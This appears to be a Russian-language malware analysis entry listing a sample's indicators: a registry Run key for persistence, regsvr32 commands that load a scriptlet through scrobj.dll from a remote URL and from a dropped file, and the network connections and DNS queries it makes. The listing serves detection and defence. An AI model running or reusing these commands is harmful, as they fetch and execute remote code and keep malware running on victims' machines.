Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '550J4SL81A' = 'regsvr32.exe /s /n /u /i:"%APPDATA%\7VJ9LE~1.TXT" scrobj.dll'
- '<SYSTEM32>\regsvr32.exe' /s /n /u /i:https://mail.cdn-line.kz/squid/changelog.txt scrobj.dll
- '<SYSTEM32>\regsvr32.exe' /s /n /u /i:"%APPDATA%\7VJ9LE~1.TXT" scrobj.dll
- %HOMEPATH%\Local Settings\<INETFILES>\Content.IE5\KHMHGZ4F\update.microsoft[1]
- %APPDATA%\7VJ9LEOUU34.txt
- 'localhost':1040
- 'ma##.#dn-line.kz':443
- 'localhost':1037
- '20#.#6.232.182':80
- http://up####.microsoft.com/ via 20#.#6.232.182
- DNS ASK ma##.#dn-line.kz
- DNS ASK up####.microsoft.com